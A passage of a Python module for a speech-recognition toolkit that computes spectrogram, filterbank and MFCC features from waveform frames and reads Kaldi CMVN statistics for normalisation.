''' assert 0 <= coeff < 1.0 assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 new = np.zeros_like(waveform) new[1:] = waveform[1:] - coeff*waveform[:-1] new[0] = waveform[0] - coeff*waveform[0] return new def pre_emphasize_2d(waveform,coeff=0.95): ''' Pre-emphasize the waveform. Args: _waveform_: (2-d np.ndarray) A batch of waveform data. _coeff_: (float) Coefficient. 0 <= coeff < 1.0. Return: A new 2-d np.ndarray. ''' assert 0 <= coeff < 1.0 assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 new = np.zeros_like(waveform) new[:,1:] = waveform[:,1:] - coeff*waveform[:,:-1] new[:,0] = waveform[:,0] - coeff*waveform[:,0] return new def get_window_function(size,winType="povey",blackmanCoeff=0.42): ''' Get a window. Args: _size_: (int) The width of window. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". Return: A 1-d np.ndarray. ''' assert isinstance(size,int) and size > 0 window = np.zeros([size,],dtype="float32") a = 2*np.pi / (size-1) for i in range(size): if winType == "hanning": window[i] = 0.5 - 0.5*np.cos(a*i) elif winType == "sine": window[i] = np.sin(0.5*a*i) elif winType == "hamming": window[i] = 0.54 - 0.46*np.cos(a*i) elif winType == "povey": window[i] = (0.5-0.5*np.cos(a*i))**0.85 elif winType == "rectangular": winType[i] = 1.0 elif winType == "blackman": assert isinstance(blackmanCoeff,float) winType[i] = blackmanCoeff - 0.5*np.cos(a*i) + (0.5-blackmanCoeff)*np.cos(2*a*i) else: raise Exception(f"Unknown Window Type: {winType}") return window def dither_singal_1d(waveform,factor=1.0): ''' Dither the signal. Args: _waveform_: (1-d np.ndarray) The waveform. _factor_: (float) Dither factor. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return cutils.dither( waveform[None,:], factor)[0] def dither_singal_2d(waveform,factor=0.0): ''' Dither the signal. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. 
_factor_: (float) Dither factor. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 return cutils.dither(waveform, factor) def remove_dc_offset_1d(waveform): ''' Remove the direct current offset. Args: _waveform_: (1-d np.ndarray) The waveform. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return waveform - np.mean(waveform) def remove_dc_offset_2d(waveform): ''' Remove the direct current offset. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 return waveform - np.mean(waveform,axis=1,keepdims=True) def compute_log_energy_1d(waveform,floor=info.EPSILON): ''' Compute log energy. Args: _waveform_: (1-d np.ndarray) The waveform. _floor_: (float) Float floor value. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return np.log(max(np.sum(waveform**2),floor)) def compute_log_energy_2d(waveform,floor=info.EPSILON): ''' Compute log energy. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. _floor_: (float) Float floor value. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 temp = np.sum(waveform**2,axis=1) temp[temp < floor] = floor return np.log(temp) def split_radix_real_fft_1d(waveform): ''' Compute split radix FFT. Args: _waveform_: (1-d np.ndarray) The waveform. Return: A tuple: (FFT length, Result ). _FFT length_: (int). _Result_: (A 2-d np.ndarray) The first dimension is real values, The second dimension is image values. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 points = len(waveform) fftLen = get_padded_fft_length(points) result = cutils.srfft(waveform[None,:],fftLen)[0] return fftLen, result def split_radix_real_fft_2d(waveform): ''' Compute split radix FFT. 
Args: _waveform_: (2-d np.ndarray) A batch of waveforms. Return: A tuple: ( FFT length, Result ). _FFT length_: (int). _Result_: (A 3-d np.ndarray) The 2st dimension is real values, The 3st dimension is image values. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 points = waveform.shape[1] fftLen = get_padded_fft_length(points) result = cutils.srfft(waveform,fftLen) return fftLen, result def compute_power_spectrum_1d(fftFrame): ''' Compute power spectrum. Args: _fftFrame_: (2-d np.ndarray) A frame of FFT result. Return: A 1-d np.ndarray. ''' assert isinstance(fftFrame,np.ndarray) and len(fftFrame.shape) == 2 zeroth = fftFrame[0,0] + fftFrame[0,1] n2th = fftFrame[0,0] - fftFrame[0,1] fftFrame = np.sum(fftFrame**2,axis=1) fftFrame[0] = zeroth**2 return np.append(fftFrame,n2th**2) def compute_power_spectrum_2d(fftFrame): ''' Compute power spectrum. Args: _fftFrame_: (2-d np.ndarray) A batch of frames. FFT results. Return: A 2-d np.ndarray. ''' assert isinstance(fftFrame,np.ndarray) and len(fftFrame.shape) == 3 zeroth = fftFrame[:,0,0] + fftFrame[:,0,1] n2th = fftFrame[:,0,0] - fftFrame[:,0,1] fftFrame = np.sum(fftFrame**2,axis=2) fftFrame[:,0] = zeroth**2 return np.append(fftFrame,(n2th**2)[:,None],axis=1) def apply_floor(feature,floor=info.EPSILON): ''' Apply float floor to feature. Args: _feature_: (np.ndarray) Feature. _floor_: (float) Float floor value. Return: A 2-d np.ndarray (Not new). ''' feature[feature<floor] = floor return feature def mel_scale(freq): ''' Do Mel scale. Args: _freq_: (int) Frequency. Return: A float value. ''' return 1127.0 * np.log (1.0 + freq / 700.0) def inverse_mel_scale(melFreq): ''' Do Inverse Mel scale. Args: _freq_: (int) Frequency. Return: A float value. ''' return 700.0 * (np.exp(melFreq/1127.0) - 1) def get_mel_bins(numBins,rate,fftLen,lowFreq=20,highFreq=0): ''' Get the Mel filters bank. Args: _numBins_: (int) The number of filters. _rate_: (int) Sampling rate. _fftLen_: (int) FFT length. 
_lowFreq_: (int) The minimum frequency. _highFreq_: (int) The maximum frequency. If zero, highFreq = rate/2. If < 0, highFreq = rate/2 - highFreq. Return: A 2-d np.ndarray with shape ( fftLen/2, numBins ). ''' assert isinstance(numBins,int) and numBins >= 0 assert isinstance(rate,int) and rate >= 2 assert isinstance(fftLen,int) and fftLen > 0 and int(np.log2(fftLen)) == np.log2(fftLen) assert isinstance(lowFreq,int) and lowFreq >= 0 assert isinstance(highFreq,int) nyquist = int(0.5 * rate) numFftBins = fftLen//2 if highFreq <= 0: highFreq = nyquist + highFreq fftBinWidth = rate/fftLen melLow = mel_scale(lowFreq) melHigh = mel_scale(highFreq) delDelta = (melHigh-melLow)/(numBins+1) result = np.zeros([numBins,numFftBins+1],dtype="float32") for binIndex in range(numBins): leftMel = melLow + binIndex * delDelta centerMel = melLow + (binIndex+1) * delDelta rightMel = melLow + (binIndex+2) * delDelta for i in range(numFftBins): freq = fftBinWidth * i mel = mel_scale(freq) if leftMel < mel < rightMel: if mel <= centerMel: weight = (mel - leftMel)/(centerMel - leftMel) else: weight = (rightMel - mel)/(rightMel - centerMel) result[binIndex,i] = weight return result.T def get_padded_fft_length(points): ''' Compute FFT length. Args: _points_: (int) Frame width. Return: An int value. ''' assert isinstance(points,int) and points >= 2 fftLen = 1 while fftLen < points: fftLen <<= 1 return fftLen def get_dct_matrix(numCeps,numBins): ''' Compute DCT matrix. Args: _numCeps_: (int) The dim. of MFCC. _numBins_: (int) The dim. of fBank. 
Return: An 2-d np.ndarray with shape: (numBins, numCeps) ''' assert isinstance(numCeps,int) and numCeps > 0 assert isinstance(numBins,int) and numBins > 0 result = np.zeros([numCeps,numBins],dtype="float32") result[0] = np.sqrt(1/numBins) normalizer = np.sqrt(2/numBins) for i in range(1,numCeps): for j in range(0,numBins): result[i,j] = normalizer * np.cos( np.pi/numBins*(j+0.5)*i ) return result.T def get_cepstral_lifter_coeff(dim,factor=22): ''' Compute cepstral lifter coefficient. Args: _dim_: (int) The dim. of MFCC. _factor_: (int) Factor. Return: A 1-d np.ndarray. ''' assert isinstance(dim,int) and dim > 0 assert factor > 0 result = np.zeros([dim,],dtype="float32") for i in range(dim): result[i] = 1.0 + 0.5*factor*np.sin(np.pi*i/factor) return result def add_deltas(feat, order=2, window=2): ''' Append delta feature. Args: _feat_: (2-d np.ndarray) Feature with shape (frames, dim). _order_: (int). _window_: (int). Return: An new 2-d np.ndarray with shape: (frames, dim * (order+1)). ''' assert isinstance(feat,np.ndarray) and len(feat.shape) == 2 assert isinstance(order,int) and order > 0 assert isinstance(window,int) and window > 0 # return cutils.add_deltas(feat,order,window) frames = feat.shape[0] dims = feat.shape[1] inputs = f"{frames} {dims} ".encode() + encode_vector_temp( feat.reshape(-1) ) cmd = os.path.join(info.CMDROOT,f"exkaldi-add-deltas --order {order} --window {window}") out = run_exkaldi_shell_command(cmd,inputs=inputs) return np.array(out,dtype="float32").reshape([frames,-1]) def splice_feats(feat, left, right): ''' Splice the left and right context of feature. Args: _feat_: (2-d np.ndarray) Feature with shape (frames, dim). _left_: (int). _right_: (int). Return: An new 2-d np.ndarray with shape: (frames, dim * (left+right+1)). 
''' assert isinstance(feat,np.ndarray) and len(feat.shape) == 2 assert isinstance(left,int) and left >= 0 assert isinstance(right,int) and right >= 0 if left == 0 and right ==0: return feat return cutils.splice_feat(feat, left, right) # This function is wrapped from kaldi_io library. def load_lda_matrix(ldaFile): ''' Read the LDA(+MLLT) matrix from Kaldi file. Args: _ldaFile_: (str) LDA matrix file path. ''' assert os.path.isfile(ldaFile), f"No such file: {ldaFile}." with open(ldaFile,"rb") as fd: binary = fd.read(2).decode() assert binary == '\0B' header = fd.read(3).decode() if header == 'FM ': sample_size = 4 elif header == 'DM ': sample_size = 8 else: raise Exception("Only FM -> float32 or DM -> float64 can be used.") s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0] buf = fd.read(rows * cols * sample_size) if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32') else: vec = np.frombuffer(buf, dtype='float64') return np.reshape(vec,(rows,cols)).T class MatrixFeatureExtractor(Component): ''' The base class of a feature extractor. Please implement the self.extract_function by your function. ''' def __init__(self,extFunc,minParallelSize=10,oKey="data",name=None): ''' Args: _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two parallel threads for one batch features. _name_: (str) Name. 
''' super().__init__(oKey=oKey,name=name) assert isinstance(minParallelSize,int) and minParallelSize >= 2 assert callable(extFunc) self.__extract_function_ = extFunc self.__minParallelBatchSize = minParallelSize//2 def core_loop(self): self.__firstStep = True while True: action = self.decide_action() self.__featureCache = [[],[]] if action is True: packet = self.get_packet() if not packet.is_empty(): iKey = packet.mainKey if self.iKey is None else self.iKey mat = packet[ iKey ] assert isinstance(mat, np.ndarray) and len(mat.shape) == 2 bsize = len(mat) if self.__firstStep or len(mat) < self.__minParallelBatchSize: newMat = self.__extract_function_( mat ) if isinstance(newMat,np.ndarray): newMat = [newMat,] else: assert isinstance(newMat,(tuple,list)) else: mid = bsize // 2 ### open thread 1 to compute first half part thread1 = threading.Thread(target=self.__extract_parallel,args=(mat[0:mid],0,)) thread1.setDaemon(True) thread1.start() ### open thread 2 to compute second half part thread2 = threading.Thread(target=self.__extract_parallel,args=(mat[mid:],1,)) thread2.setDaemon(True) thread2.start() thread1.join() thread2.join() if None in self.__featureCache: raise Exception("Extraction functions had errors.") ### Concat newMat = [] for i in range( len(self.__featureCache[0]) ): newMat.append( np.concatenate( [self.__featureCache[0][i],self.__featureCache[1][i]],axis=0) ) if self.__firstStep: for mat in newMat: assert (isinstance(mat,np.ndarray) and len(mat.shape) == 2) ,\ "The output of feature function must be a ( 1d -> 1 frame or 2d -> N frames) Numpy array." if mat.shape[0] != bsize: print(f"{self.name}: Warning! The frames of features is lost.") self.__firstStep = False ## Append feature into PIPE if necessary. for i,mat in enumerate(newMat): packet.add(key=self.oKey[i],data=mat,asMainKey=True) self.put_packet( packet ) else: break def __extract_parallel(self,featChunk,ID): ''' A thread function to compute feature. 
''' try: outs = self.__extract_function_(featChunk) except Exception as e: self.__featureCache[ID] = None raise e else: if isinstance(outs,np.ndarray): outs = [outs,] else: assert isinstance(outs,(tuple,list)) self.__featureCache[ID] = outs class SpectrogramExtractor(MatrixFeatureExtractor): ''' Spectrogram feature extractor. ''' def __init__(self,energyFloor=0.0,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,minParallelSize=10, oKey="data",name=None): ''' Args: _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _energyFloor_: (float) The energy floor value. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. _blackmanCoeff_: (float) Blackman window coefficient. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. 
''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(rawEnergy,bool) assert isinstance(dither,float) and dither >= 0.0 assert isinstance(removeDC,bool) assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither_factor = dither self.__winInfo = (winType, blackmanCoeff) self.__window = None def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) if self.__dither_factor != 0: frames = dither_singal_2d(frames, self.__dither_factor) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff > 0: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) frames = apply_floor(frames) frames = np.log(frames) if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames[:,0] = energies return frames class FbankExtractor(MatrixFeatureExtractor): ''' FBank feature extractor. ''' def __init__(self,rate=16000, energyFloor=0.0,useEnergy=False,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,usePower=True, numBins=23,lowFreq=20,highFreq=0,useLog=True, minParallelSize=10, oKey="data",name=None): ''' Args: _rate_: (int) Sampling rate. _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. 
_energyFloor_: (float) The energy floor value. _useEnergy_: (bool) If True, Add energy dim. to the final fBank feature. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. _blackmanCoeff_: (float) Blackman window coefficient. _usePower_: (bool) If True, use power spectrogram. _numBins_: (int) The dim. of fBank feature. _lowFreq_: (int) The minimum frequency. _lowFreq_: (int) The maximum frequency. _useLog_: (bool) If True, compute log fBank. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. ''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(rate,int) and rate > 0 assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(useEnergy,bool) assert isinstance(rawEnergy,bool) assert isinstance(dither,float) and dither >= 0.0 assert isinstance(removeDC,bool) assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 assert isinstance(usePower,bool) assert isinstance(useLog,bool) self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__add_energy = useEnergy self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither = dither self.__usePower = usePower self.__useLog = useLog self.__winInfo = (winType, blackmanCoeff) self.__window = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = 
get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) if self.__dither != 0: frames = dither_singal_2d(frames, self.__dither) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__add_energy and self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if self.__add_energy and not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) if not self.__usePower: frames = frames**0.5 frames = np.dot( frames, self.__melFilters ) if self.__useLog: frames = apply_floor(frames) frames = np.log(frames) if self.__add_energy: if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames = np.concatenate([energies[:,None],frames],axis=1) return frames class MfccExtractor(MatrixFeatureExtractor): ''' MFCC feature extractor. ''' def __init__(self,rate=16000, energyFloor=0.0,useEnergy=True,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42, numBins=23,lowFreq=20,highFreq=0,useLog=True, cepstralLifter=22,numCeps=13, minParallelSize=10, oKey="data",name=None): ''' Args: _rate_: (int) Sampling rate. _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _energyFloor_: (float) The energy floor value. _useEnergy_: (bool) If True, Replace the first dim. of feature with energy. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. 
_blackmanCoeff_: (float) Blackman window coefficient. _numBins_: (int) The dim. of fBank feature. _lowFreq_: (int) The minimum frequency. _lowFreq_: (int) The maximum frequency. _useLog_: (bool) If True, compute log fBank. _cepstralLifter_: (int) MFCC lifter factor. _numCeps_: (int) The dim. of MFCC feature. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. ''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(rate,int) assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(dither,float) and dither >= 0.0 assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 assert isinstance(cepstralLifter,int) and numBins >= 0 assert isinstance(numCeps,int) and 0 < numCeps <= numBins assert isinstance(useEnergy,bool) assert isinstance(rawEnergy,bool) assert isinstance(removeDC,bool) assert isinstance(useLog,bool) self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__use_energy = useEnergy self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither = dither self.__useLog = useLog self.__winInfo = (winType, blackmanCoeff) self.__window = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None self.__dctMat = get_dct_matrix(numCeps=numCeps,numBins=numBins) if cepstralLifter > 0: self.__cepsCoeff = get_cepstral_lifter_coeff(dim=numCeps,factor=cepstralLifter) else: self.__cepsCoeff = 1 def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = 
get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) if self.__dither != 0: frames = dither_singal_2d(frames, self.__dither) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__use_energy and self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if self.__use_energy and not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) frames = np.dot( frames, self.__melFilters ) frames = apply_floor(frames) frames = np.log(frames) frames = frames.dot(self.__dctMat) frames = frames * self.__cepsCoeff if self.__use_energy: if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames[:,0] = energies return frames class MixtureExtractor(MatrixFeatureExtractor): ''' Mixture feature extractor. You can extract Mixture of "spectrogram", "fbank" and "mfcc" in the same time. ''' def __init__(self, mixType=["mfcc","fbank"], rate=16000,dither=0.0,rawEnergy=True,winType="povey", removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,energyFloor=0.0, numBins=23,lowFreq=20,highFreq=0, useEnergyForFbank=True, usePowerForFbank=True, useLogForFbank=True, useEnergyForMfcc=True, cepstralLifter=22,numCeps=13, minParallelSize=10,oKeys=None,name=None): # Check the mixture type assert isinstance(mixType,(list,tuple)), f"{self.name}: <mixType> should be a list or tuple." for featType in mixType: assert featType in ["mfcc","fbank","spectrogram"], f'{self.name}: <mixType> should be "mfcc","fbank","spectrogram".' 
assert len(mixType) == len(set(mixType)) and len(mixType) > 1 self.__mixType = mixType if oKeys is None: oKeys = mixType else: assert isinstance(oKeys,(tuple,list)) and len(oKeys) == len(mixType) super().__init__(extFunc=self.__extract_function, minParallelSize=minParallelSize,oKey=oKeys,name=name) # Some parameters for basic computing assert isinstance(rate,int) assert isinstance(dither,float) and dither >= 0.0 self.__dither_factor = dither assert isinstance(removeDC,bool) self.__remove_dc_offset = removeDC assert isinstance(rawEnergy,bool) self.__need_raw_energy = rawEnergy assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 self.__preemph_coeff = preemphCoeff assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 self.__winInfo = (winType,blackmanCoeff) self.__window = None assert isinstance(energyFloor,float) and energyFloor >= 0.0 self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 #???? # Some parameters for fbank assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 if highFreq != 0 : assert highFreq > lowFreq self.__fftLen = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None assert isinstance(useEnergyForFbank,bool) self.__use_energy_fbank = useEnergyForFbank assert isinstance(useLogForFbank,bool) self.__use_log_fbank = useLogForFbank assert isinstance(usePowerForFbank,bool) self.__use_power_fbank = usePowerForFbank # Some parameters for mfcc assert isinstance(cepstralLifter,int) and numBins >= 0 assert isinstance(numCeps,int) and 0 < numCeps <= numBins assert isinstance(useEnergyForMfcc,bool) self.__use_energy_mfcc = useEnergyForMfcc self.__dctMat = get_dct_matrix(numCeps=numCeps,numBins=numBins) if cepstralLifter > 0: self.__cepsCoeff = get_cepstral_lifter_coeff(dim=numCeps,factor=cepstralLifter) else: self.__cepsCoeff = 1 def __extract_function(self,frames): #print( self.__mixType, self.oKey ) if self.__window is 
None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) # Dither singal if self.__dither_factor != 0: frames = dither_singal_2d(frames, self.__dither_factor) # Remove dc offset if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) # Compute raw energy if self.__need_raw_energy: energies = compute_log_energy_2d(frames) # Pre-emphasize if self.__preemph_coeff > 0: frames = pre_emphasize_2d(frames, self.__preemph_coeff) # Add window frames *= self.__window # Compute energy if not self.__need_raw_energy: energies = compute_log_energy_2d(frames) # Apply energy floor if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor # FFT _, frames = split_radix_real_fft_2d(frames) # Power spectrogram frames = compute_power_spectrum_2d(frames) outFeats = {} # Compute the spectrogram feature if "spectrogram" in self.__mixType: specFrames = frames.copy() specFrames = apply_floor( specFrames ) specFrames = np.log( specFrames ) specFrames[:,0] = energies outFeats[ self.oKey[ self.__mixType.index("spectrogram") ] ] = specFrames # Compute the fbank feature if "fbank" in self.__mixType: fbankFrames = frames.copy() if not self.__use_power_fbank: fbankFrames = fbankFrames**0.5 fbankFrames = np.dot( fbankFrames, self.__melFilters ) if self.__use_log_fbank: fbankFrames = apply_floor(fbankFrames) fbankFrames = np.log(fbankFrames) if self.__use_energy_fbank: fbankFrames = np.concatenate([energies[:,None],fbankFrames],axis=1) outFeats[ self.oKey[ self.__mixType.index("fbank") ] ] = fbankFrames # Compute the mfcc feature if "mfcc" in self.__mixType: mfccFeats = frames mfccFeats = np.dot( mfccFeats, self.__melFilters ) mfccFeats = apply_floor( mfccFeats ) mfccFeats = np.log( mfccFeats ) mfccFeats = mfccFeats.dot( self.__dctMat ) 
mfccFeats = mfccFeats * self.__cepsCoeff if self.__use_energy_mfcc: mfccFeats[:,0] = energies outFeats[ self.oKey[ self.__mixType.index("mfcc") ] ] = mfccFeats return tuple( outFeats[oKey] for oKey in self.oKey ) ############################################### # 2. Some functions for Online CMVN ############################################### def compute_spk_stats(feats): ''' Compute the statistics from speaker utterances. Args: _feats_: (2-d array, list or tuple) All utterances of a speaker. Return: A 2-d array with shape (2, feat dim + 1) ''' if not isinstance(feats,(list,tuple)): feats = [feats,] dim = None stats = None for feat in feats: assert isinstance(feat,np.ndarray) and len(feat.shape) == 2, "<feats> should be 2-d NumPy array." if dim is None: dim = feat.shape[1] stats = np.zeros([2,dim+1],dtype=feat.dtype) else: assert dim == feat.shape[1], "Feature dims do not match!" stats[0,0:dim] += np.sum(feat,axis=0) stats[1,0:dim] += np.sum(feat**2,axis=0) stats[0,dim] += len(feat) return stats def get_kaldi_cmvn(fileName,spk=None): ''' get the global(or speaker) CMVN from Kaldi cmvn statistics file. Args: _fileName_: (str) Kaldi cmvn .ark file. _spk_: (str) Speaker ID. Return: A 2-d array. ''' assert os.path.isfile(fileName), f"No such file: {fileName} ." assert spk is None or isinstance(spk,str), f"<spk> should be a string." result = None with open(fileName, 'rb') as fp: while True: # read utterance ID utt = '' while True: char = fp.read(1).decode() if (char == '') or (char == ' '):break utt += char utt = utt.strip() if utt == '': if fp.read() == b'': break else: raise Exception("Miss utterance ID before utterance in stats file.") # read binary symbol binarySymbol = fp.read(2).decode() if binarySymbol == '\0B': sizeSymbol = fp.read(1).decode() if sizeSymbol not in ["C","F","D"]: raise Exception(f"Missed format flag. 
This might not be a kaldi stats file.") dataType = sizeSymbol + fp.read(2).decode() if dataType == 'CM ': raise Exception("Unsupported to read compressed binary kaldi matrix data.") elif dataType == 'FM ': sampleSize = 4 dtype = "float32" elif dataType == 'DM ': sampleSize = 8 dtype = "float64" else: raise Exception(f"Expected data type FM -> float32, DM -> float64 but got {dataType}.") s1,rows,s2,cols = np.frombuffer(fp.read(10),dtype="int8,int32,int8,int32",count=1)[0] rows = int(rows) cols = int(cols) bufSize = rows * cols * sampleSize buf = fp.read(bufSize) else: raise Exception("Miss binary symbol before utterance in stats file.") data = np.frombuffer(buf,dtype=dtype).reshape([rows,cols]) if spk == utt: return data elif spk is None: if result is None: result = data.copy() else: result += data if spk is not None: raise Exception(f"No such utterance: {spk}.") else: return result def spk_to_utt(spk,spk2utt): ''' Args: <spk>: a string. <spk2utt>: spk2utt file. Return: a list of utterance IDs. ''' assert isinstance(spk,str) and len(spk.strip()) > 0 assert os.path.isfile(spk2utt), f"No such file: {spk2utt}." with open(spk2utt,"r") as fr: lines = fr.readlines() for line in lines: line = line.strip() if line == "": continue line = line.split() if line[0] == spk: return line[1:] return [] def utt_to_spk(utt,utt2spk): ''' Args: <utt>: a string. <utt2spk>: spk2utt file. Return: a string. ''' assert isinstance(utt,str) and len(utt.strip()) > 0 assert os.path.isfile(utt2spk), f"No such file: {utt2spk}." with open(utt2spk,"r") as fr: lines = fr.readlines() for line in lines: line = line.strip() if line == "": continue line = line.split() assert len(line) == 2 if line[0] == utt: return line[1] return None '''A base class for CMV normalizer''' class CMVNormalizer(ExKaldiRTBase): ''' CMVN used to be embeded in FeatureProcesser. Note that this is not Component. ''' def __init__(self,offset=-1,name=None): ''' Args: _offset_: (int) The dim. offset. _name_: (str) Name. 
''' super().__init__(name=name) assert isinstance(offset,int) and offset >= -1 self.__offset = offset @property def offset(self): return self.__offset @property def dim(self): raise Exception(f"{self.name}: Please implement the .dim function.") class ConstantCMVNormalizer(CMVNormalizer): ''' Constant CMVN. ''' def __init__(self,gStats,std=False,offset=-1,name=None): ''' Args: _gStats_: (2-d array) Previous statistics. A numpy array with shape: (2 or 1, feature dim + 1). _std_: (bool) If True, do variance normalization. _offset_: (int). _name_: (str). ''' super().__init__(offset=offset,name=name) assert isinstance(std,bool), "<std> must be a bool value." self.__std = std self.redirect(gStats) def redirect(self,gStats): ''' Redirect the global statistics. Args: _gStats_: (2-d array) Previous statistics. A numpy array with shape: (2 or 1, feature dim + 1). ''' assert isinstance(gStats,np.ndarray), f"{self.name}: <gStats> of .resirect method must be a NumPy array." if len(gStats.shape) == 1: assert self.__std is False self.__cmv = 